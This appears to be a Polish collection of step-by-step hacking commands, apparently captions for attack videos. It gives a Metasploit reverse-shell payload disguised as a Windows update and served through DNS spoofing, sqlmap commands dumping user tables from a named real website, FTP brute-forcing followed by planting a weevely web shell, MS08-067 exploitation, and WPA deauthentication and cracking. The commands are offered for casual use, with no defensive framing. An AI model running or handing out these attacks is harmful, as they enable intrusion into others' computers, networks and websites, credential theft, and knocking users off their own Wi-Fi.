Komendy:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 x > /root/var/www/Windows-KB183905-x86-x64-PL.exe
kwrite /usr/share/ettercap/etter.dns
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER
Automatyczny atak sql injection przy urzyciu sqlmap
Komendy:
cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump
i logujemy sie ;)
p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap
video nie moje mam nadzieje ze autor sie nie obrazi a nawet jak sie obrazi to zrobimy nowe zapraszam na youtube channel: ruo911 pozdro
Komendy:
ifconfig
nmap 192.168.2.*
msfconsole
use auxiliary/scanner/ftp/ftp_login
set USER_FILE Desktop/loginy.lst
set PASS_FILE Desktop/password.lst
set RHOSTS 192.168.2.100
set STOP_ON_SUCCESS true
run
cd /pentest/backdoors/web/weevely
./weevely.py generate 5m4ru /root/Desktop/backdors.php
wysylamy backdora na ftp (w moim przypadku filezilla)
./weevely.py http://192.168.2.100/backdors.php 5m4ru (podajemy scierzke url gdzie znajduje sie nasza furtak powodzenia ! )
GAME OVER
Komendy:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(opcjonalnie) sudo python ./setup.py install
GAME OVER
Komendy:
nmap -sS -O 192.168.4.65
msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.4.65
set LHOST 192.168.4.53
exploit
GAME OVER
Odzyskiwanie klucza WPA Bruteforce (bezsłownika)
Komendy:
iwconfig
airmon-ng start wlan2
airodump-ng mon0
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 -w pakiety mon0
aireplay-ng -0 4 -a 00:16:38:44:A5:D1 -c F4:EC:38:91:22:05 mon0
cd /pentest/passwords/crunch/
./crunch 8 8 abcdefghijklmnoprstwvxyz -t what@@@@ | aircrack-ng /root/pakiety-01.cap -e cell -w -
GAME OVER
Komendy:
iwconfig (sprawdzamy jak nazywa się interface naszej kart sieciowej np. wlan0,wlan1 itp.)
airmon-ng start wlan2 (przełączamy kartę w tryb monitoringu w moim przypadku jest to wlan2)
airodump-ng mon0 (patrzymy jakie sieci maja zabezpieczenia zatrzymujemy ctrl+c)
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 -w pakiety mon0 (--bssid to nic innego jak mac routera a --channel 1 to kanał nr 1 -w zapis pakietów do pliku o nazwie pakiety)
aireplay-ng -0 4 -a 00:16:38:44:A5:D1 -c F4:EC:38:91:22:05 mon0 ( -0 wykopujemy użytkownika z jego własnej sieci -a mac routera -c mac clienta )
aircrack-ng -w Desktop/password.lst *cap ( -w podajemy ścieżkę do słowika z hasłami milej zabawy. )
GAME OVER
Komendy:
iwconfig (sprawdzamy jak nazywa się interface naszej kart sieciowej np. wlan0,wlan1 itp.)
airmon-ng start wlan2 (przełączamy kartę w tryb monitoringu w moim przypadku jest to wlan2)
airodump-ng mon0 (patrzymy jakie sieci maja zabezpieczenia zatrzymujemy ctrl+c)
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 -w pakiety mon0 (--bssid to nic innego jak mac routera a --channel 1 to kanał nr 1 -w zapis pakietów do pliku o nazwie pakiety)
aircrack-ng *cap (otwieram wszystkie zapisane pakiety z rozszerzeniem cap i zaczyna sie zabawa)
GAME OVER